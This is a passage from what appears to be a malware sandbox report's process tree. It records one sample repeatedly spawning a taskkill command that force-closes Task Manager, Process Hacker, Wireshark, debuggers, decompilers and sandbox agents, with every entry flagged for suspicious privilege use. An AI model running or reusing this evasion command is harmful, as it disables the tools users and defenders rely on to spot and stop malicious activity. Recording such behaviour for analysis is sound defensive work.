        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4904
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2112
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1544
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1072
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4920
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3252
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2300
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:396
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3572
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4712
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1944
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4924
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1132
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3988
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4120
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3892
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2460
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3904
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3028
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1972
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4140
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2800
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4424
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:984
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2456
      - C:\Windows\system32\taskkill.exe
        
